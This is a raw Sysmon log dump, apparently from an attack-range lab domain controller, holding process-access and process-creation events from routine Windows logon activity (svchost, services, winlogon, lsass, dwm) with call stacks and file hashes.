10:39:53.667{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.667{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.667{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.667{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.667{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.667{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0A00-000000007F01}852940C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0800-000000007F01}724740C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1400-000000007F01}1348C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0900-000000007F01}7801076C:\Windows\system32\winlogon.exe{733EE690-3DF9-5F80-1400-000000007F01}1348C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.653{733EE690-3DF9-5F80-1400-000000007F01}1348C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{733EE690-3DF9-5F80-C5B4-000000000000}0xb4c51SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF9-5F80-0E00-000000007F01}10881340C:\Windows\system32\LogonUI.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0A00-000000007F01}8521120C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.651{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0A00-000000007F01}8521116C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1300-000000007F01}1252C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1300-000000007F01}1252C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 